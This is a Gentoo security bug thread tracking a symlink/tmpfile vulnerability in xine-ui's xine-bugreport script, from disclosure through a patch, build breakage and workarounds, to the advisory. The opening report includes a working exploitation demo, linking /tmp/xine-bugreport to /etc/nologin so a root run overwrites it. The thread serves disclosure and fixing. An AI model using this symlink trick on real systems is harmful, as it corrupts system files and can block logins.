Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 45448 - media-video/xine-ui: Symlink/tmpfile bug in xine-check and xine-bugreport
Summary: media-video/xine-ui: Symlink/tmpfile bug in xine-check and xine-bugreport
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: GLSA Errors (show other bugs)
Hardware: All All
: Highest critical (vote)
Assignee: Gentoo Security
URL: http://nettwerked.mg2.org/advisories/...
Whiteboard:
Keywords:
: 47737 47748 47749 47794 47811 47841 (view as bug list)
Depends on: 48107 48108
Blocks:
  Show dependency tree
 
Reported: 2004-03-22 15:59 UTC by Tobias Weisserth
Modified: 2004-04-26 22:50 UTC (History)
12 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments
add symlink checks to xine-check (& xine-bugreport) (xine-check.patch,6.34 KB, patch)
2004-03-26 16:38 UTC, Julian Phillips
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Tobias Weisserth 2004-03-22 15:59:59 UTC
Read the URL for details (http://nettwerked.mg2.org/advisories/xinebug). This got posted on bugtraq Saturday, 20/03/2004.

Reproducible: Always
Steps to Reproduce:
In the section of the xine-bugreport/xine-check script
which assembles a bug report email, a symlink
vulnerability exists due to an insecure file write of
the finished bug report email template.  This may
allow an attacker to write to/corrupt sensitive system
files, and in theory elevate privileges, although
unlikely.
Actual Results:  
Exploitation
#############

Below is an example exploitation scenario which I
actually carried out on my system.

--- attack ---
[shaun@localhost shaun]$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
[shaun@localhost shaun]$ ln -s /etc/nologin
/tmp/xine-bugreport

[...]

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to
run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
         You should definitely run xine as normal
user, not root. Running it as
         root will expose you to some severe security
issues.
         This script should run as the same user that
you would use to run
         xine. If you run me as root (as you currently
are), I cannot check
         if your real-life user has sufficient
permissions...
         Unless you want to recheck something with
root permissions, you should
         abort me now (press Ctrl-C) and run me from
your usual account.
         press <enter> to continue...



[ good ] you're using Linux, doing specific tests


[ good ] looks like you have a /proc filesystem
mounted.


[ good ] You seem to have a reasonable kernel version
(2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR
support
[ good ] you have MTRR support and there are some
ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
         The xine-config script can be used to
deternime some file locations
         used by xine-lib, but you don't have such a
script on your system.
         However, it looks like you installed xine
from the RedHat packages.
         So I'll just guess that you are using the
standard locations.
         If you want me to be sure about those file
locations, you can install
         the 'xine-lib-devel' package (or
'xine-devel', depend on what packages
         you're using, which contains xine-config.
However, this package is
         not really needed to run xine...
         press <enter> to continue...
[ good ] plugin directory /usr/lib/xine/plugins
exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
         /dev/dvd is the default device that xine uses
for playing DVDs.
         You could make your life easier by creating a
symlink named /dev/dvd
         pointing to your DVD device (something like
/dev/scd0 or /dev/hdc).
         If your DVD-ROM device is /dev/hdb (slave
ATAPI device on primary bus),
         rm /dev/dvd
         ln -s hdb /dev/dvd
         typed as root will give you the symlink.
         Alternatively, you can configure xine to use
the real device directly,
         using the setup dialog within xine, but I
can't check your DMA
         settings in that case...
         press <enter> to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
         That means xine will have to to color space
transformation and scaling
         in software, which is quite CPU intensive.
Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find
accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...
[ hint ] Your X server doesn't support packed YUV
overlays.
         That means xine will have to to color space
transformation and scaling
         in software, which is quite CPU intensive.
Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find
accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...
[ hint ] Your X server doesn't have any XVideo
support...
         XVideo is an X server extension introduced by
XFree86 4.x. This
         extension provides access to hardware
accelerated color space
         conversion and scaling, which gives a great
performance boost.
         If you have a fast (>1GHz) machine, you may
be able to watch all
         kinds of video, anyway. You will waste lots
of CPU cycles, though...
         press <enter> to continue...


Could you solve your xine problems using the previous
hints? (y/n)?
'pardon?? neither yes nor no? assuming no...

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to
run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
         You should definitely run xine as normal
user, not root. Running it as
         root will expose you to some severe security
issues.
         This script should run as the same user that
you would use to run
         xine. If you run me as root (as you currently
are), I cannot check
         if your real-life user has sufficient
permissions...
         Unless you want to recheck something with
root permissions, you should
         abort me now (press Ctrl-C) and run me from
your usual account.
         press <enter> to continue...

[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem
mounted.
[ good ] You seem to have a reasonable kernel version
(2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR
support
[ good ] you have MTRR support and there are some
ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
         The xine-config script can be used to
deternime some file locations
         used by xine-lib, but you don't have such a
script on your system.
         However, it looks like you installed xine
from the RedHat packages.
         So I'll just guess that you are using the
standard locations.
         If you want me to be sure about those file
locations, you can install
         the 'xine-lib-devel' package (or
'xine-devel', depend on what packages
         you're using, which contains xine-config.
However, this package is
         not really needed to run xine...
         press <enter> to continue...

[ good ] plugin directory /usr/lib/xine/plugins
exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to
/dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
         /dev/dvd is the default device that xine uses
for playing DVDs.
         You could make your life easier by creating a
symlink named /dev/dvd
         pointing to your DVD device (something like
/dev/scd0 or /dev/hdc).
         If your DVD-ROM device is /dev/hdb (slave
ATAPI device on primary bus),
         rm /dev/dvd
         ln -s hdb /dev/dvd
         typed as root will give you the symlink.
         Alternatively, you can configure xine to use
the real device directly,
         using the setup dialog within xine, but I
can't check your DMA
         settings in that case...
         press <enter> to continue...

[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
         That means xine will have to to color space
transformation and scaling
         in software, which is quite CPU intensive.
Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find
accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...

[ hint ] Your X server doesn't support packed YUV
overlays.
         That means xine will have to to color space
transformation and scaling
         in software, which is quite CPU intensive.
Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find
accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...

[ hint ] Your X server doesn't have any XVideo
support...
         XVideo is an X server extension introduced by
XFree86 4.x. This
         extension provides access to hardware
accelerated color space
         conversion and scaling, which gives a great
performance boost.
         If you have a fast (>1GHz) machine, you may
be able to watch all
         kinds of video, anyway. You will waste lots
of CPU cycles, though...
         press <enter> to continue...



Could you solve your xine problems using the previous
hints? (y/n)?
n

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
please select (1..8): 8
please describe your xine problem briefly in _one_
line ( < 65 characters):
hello world


You should include a _complete_ copy of xine's output
in your bug report.
Note, however, that there is a 40K limit on messages
sent to the mailing list,
So you should strip down the parts that repeat over
and over,
if there are any.
You can either copy&paste this output from the
terminal where you ran xine,
or you can collect xine's output in a file named
/tmp/xine.out, using
this command:
xine >/tmp/xine.out 2>&1
(assuming you have a Bourne compatible shell, like
bash, for example)
If you need to add any parameters, you can do so...
This method is useful if you want to remove part of
the output...
Which method would you prefer?
1) copy&paste
2) logfile /tmp/xine.out
please select (1..2): 2

please press <return> when you have the log ready in
/tmp/xine.out

Hmmm, I could not read the /tmp/xine.out file.
Skipping this step.
You may add the output later, if this wasn't your
intention...
         press <enter> to continue...



Okay. That's all I could guide you through...
I have assembled a skeleton for your bugreport in the
file

   /tmp/xine-bugreport

You're strongly encouraged to add a detailed
description of your problem.
Just look for 'additional description', and fill it
in...

When you're finished, you can use your favourite
mailer to send it to
<xine-user@lists.sf.net>. Please use this subject
line, or something similar:
Subject: bug: hello world
Alternatively, I could try to send the bug report for
you, using
/bin/mail -s "bug: hello world"
Please make sure to add the additional description
before saying "yes"!
Do you want me to do this now? (y/n)?
n
Thanks for your bugreport! Have a nice day!

[...]

[shaun@localhost shaun]$ ls -al /etc/nologin
-rw-r--r--    1 root     root         1756 Mar 20
21:56 /etc/nologin
[shaun@localhost shaun]$
Comment 1 Joshua J. Berry (CondorDes) (RETIRED) gentoo-dev 2004-03-23 20:17:55 UTC
I can confirm this with xine-ui 0.9.23, but for some reason I can't get to the Xine website to see if an updated version has been released.
Comment 2 schaedpq 2004-03-26 02:34:43 UTC
Mhmm, I just looked at the xine website. The latest version is 1-rc3b, therefore there is apparently no fixed version available.
There is now an entry in bugtraqs vulnerability db: http://www.securityfocus.com/bid/9939/info/
Except a list of vulnerable versions it doesn't seem to contain anything new.
Comment 3 solar (RETIRED) gentoo-dev 2004-03-26 03:35:30 UTC
I'm going to sleep now.. 
hopefully by the time I wake up one of you will have attached a patch (hint, hint)
Comment 4 solar (RETIRED) gentoo-dev 2004-03-26 14:05:50 UTC
No patch I see..

Ok how about this.. I assume this is a shell script.. with some blatant 
reference to /tmp.. If this is the case (shell script) could somebody
please upload it so that a patch may be created.

------------------------------------------------------------------
BTW: In the future please don't open a bug with the status of GLSA.
The product goes to GLSA after the bug is done being worked on in the 
portage system.
Thanks.
Comment 5 Julian Phillips 2004-03-26 16:38:03 UTC
Created attachment 28126 [details, diff]
add symlink checks to xine-check (& xine-bugreport)

This should stop xine-check/xine-bugreport blindly writing into symlinks for
the logfile, tmpfile or bugreport.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2004-04-07 08:31:57 UTC
Reassigning correct Product/component as the bug has not been worked out yet.
-K
Comment 7 Kurt Lieber (RETIRED) gentoo-dev 2004-04-08 08:02:02 UTC
media-video herd -- can you review/comment and apply the patch if appropriate?
Comment 8 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-13 06:05:00 UTC
Working on it... looks like I'm the only cowboy for this herd right now. Not a good state, if you have a look at the bug list :-(
Comment 9 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-13 06:35:12 UTC
Ok, all versions in CVS now are patched. Go ahead.
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 06:55:14 UTC
Patrick:

Your commit doesn't show up on CVSweb :
http://www.gentoo.org/cgi-bin/viewcvs.cgi/media-video/xine-ui/?hideattic=1#dirlist

Or do I have sync problems, or am I looking in the wrong package ?
Thanks for your work, media-video is a large herd to watch all alone :)

-K
Comment 11 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 09:52:02 UTC
OK I'm out of sync :)

Ready for a GLSA :
x86 should upgrade to xine-ui-0.9.21-r1
ppc should upgrade to xine-ui-0.9.13-r1
Comment 12 Derk W te Bokkel 2004-04-13 10:14:47 UTC
um .. build for xine-ui-0.9.23-r1 crashes and burns on the introduction of the patch.

emerge fragment...

make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/desktops'
Making all in visuals
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
test `cd .; pwd` = `pwd` || cp ./xine-check.sh.in .
perl ./build-xine-check.pl ./xine-check.en
chmod a+x xine-check
ln -s xine-check xine-bugreport
ln: `xine-bugreport': File exists
make[3]: *** [xine-bugreport] Error 1
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23'
make: *** [all] Error 2

!!! ERROR: media-video/xine-ui-0.9.23-r1 failed.
!!! Function src_compile, Line 43, Exitcode 2
!!! (no error message)

attempt to symlink finds a real file already there .. previous version (without -r1) installed fine 
Comment 13 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:17:13 UTC
*** Bug 47737 has been marked as a duplicate of this bug. ***
Comment 14 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:17:40 UTC
sorry guys, there's something work with this patch.
Comment 15 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 11:21:46 UTC
Hmm... going back to wait_for_ebuild
phosphan: your opinion on the problem ?

Someone with powers should remove the offending ebuild ?
Comment 16 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:36:39 UTC
i've also created a bug upstream
http://sourceforge.net/tracker/index.php?func=detail&aid=934417&group_id=9655&atid=109655
Comment 17 Derk W te Bokkel 2004-04-13 12:02:17 UTC
A minor subtlety .. my previous xine-ui-0.9.23.ebuild with the true-false patch added installed fine.. Apparently some changes had occurred since I last installed (had to use the ebuild copy out of /var/db in order to test). So some thing in the symlink patch is causing the file xine-bugreport to exist too soon perhaps? It is created seemingly before xine-check according to the time stamps ..
Comment 18 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 12:20:42 UTC
i've just commited a fix.
please test and report
Comment 19 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 13:28:48 UTC
*** Bug 47749 has been marked as a duplicate of this bug. ***
Comment 20 Derk W te Bokkel 2004-04-13 14:07:03 UTC
nope at this time it still does the same thing (ebuild time stamp 12:37 now instead of 6:33).. perhaps using a "ln -sf" would work but I don't know how to add that..
nothing seems to have changed (except a few quotes removed).. comparing the ebuilds .. perhaps it has not yet hit the mirrors?? 

Comment 21 Tim Burrell 2004-04-13 15:27:21 UTC
emerge -pu world broke on xine-ui install.  
Come on guys, get it together.  
This shouldn't be happening on the stable branch.

Just so I don't sound like a total ass:
Gentoo is great, and so are the people who help
make it happen.  Except for the odd time. :o).
Comment 22 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 15:31:49 UTC
*** Bug 47748 has been marked as a duplicate of this bug. ***
Comment 23 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 15:36:23 UTC
it compiles here on both of my dev boxes
Comment 24 Derk W te Bokkel 2004-04-13 16:05:08 UTC
okay I can make it compile and install using the ebuild commands .. provided I clobber xine-bugreport .. ""after unpack" or rather after a failed emerge" and before compile, install and qmerge..  
Comment 25 Derk W te Bokkel 2004-04-13 16:18:38 UTC
okay 

add the line

rm misc/xine-bugreport

as the first line inside the Braces of the src_compile routine in the ebuild and it all works ..

Comment 26 Ian Truelsen 2004-04-13 16:25:21 UTC
The src_compile alteration cured the problem for me.
Comment 27 Scott Taylor (RETIRED) gentoo-dev 2004-04-14 00:25:38 UTC
*** Bug 47794 has been marked as a duplicate of this bug. ***
Comment 28 Scott Taylor (RETIRED) gentoo-dev 2004-04-14 08:33:16 UTC
ack! what a pain this was... the misc/xine-bugreport is a symlink created by the
makefile. This file should not have appeared in the .22 tarball. The symlink-patch
tried patching both these original files. So, on .23 which properly did NOT have
the -bugreport file, the patch added it before the build. So the same problem
reappeared. It was a moving target. Fixing one broke the other. Both versions
listed below should work, and should have this security patch properly applied.

0.9.22-r2 (x86) and 0.9.23-r1 (~x86)
Comment 29 Derk W te Bokkel 2004-04-14 10:06:26 UTC
um .. the line

rm misc/xine-bugreport

is still needed for xine-ui-0.9.23-r1 to build completely .. something about the patching process is still creating a real xine-bugreport file before the symlinking happens so it chokes if the file is not clobbered..

derk
Comment 30 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 10:14:00 UTC
please clean your PORTAGE_TMPDIR="/var/tmp"
and try again
Comment 31 Derk W te Bokkel 2004-04-14 10:16:42 UTC
sorry still chokes after that.

note I also tried removing the actual patching of xine-bugreport from the patch file also trying to apply the patch to only xine-check or xine-check.sh.in but any patching still results in the creation of xine-bugreport in some fashion probably by the makefile config processes. Probably any kind of date stamp alteration (atime, mtime) is setting it off.
Comment 32 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 12:45:44 UTC
*** Bug 47811 has been marked as a duplicate of this bug. ***
Comment 33 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 12:47:36 UTC
xine-ui-0.9.23-r1.ebuild,v 1.3 cvs header fixes all issues

time to send out GLSA
Comment 34 ra 2004-04-14 12:58:39 UTC
Had this problem on two seperate computers. Both fixed by using the suggestion here: http://bugs.gentoo.org/show_bug.cgi?id=45448#c25
Comment 35 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 15:09:50 UTC
*** Bug 47841 has been marked as a duplicate of this bug. ***
Comment 36 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-14 23:33:27 UTC
Sorry for causing so much trouble, should've checked the side effects more thoroughly.
Comment 37 Thierry Carrez (RETIRED) gentoo-dev 2004-04-17 07:52:32 UTC
Two new vulnerabilities in xine-ui (#48108) and xine-lib (#48107) have just been submitted. A global GLSA will be published when all xine-* vulns will be fixed.
Comment 38 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-19 01:43:38 UTC
xine-ui-0.9.23-r2 includes the patch from #48108.
Comment 39 Joshua J. Berry (CondorDes) (RETIRED) gentoo-dev 2004-04-26 22:50:09 UTC
GLSA 200404-20.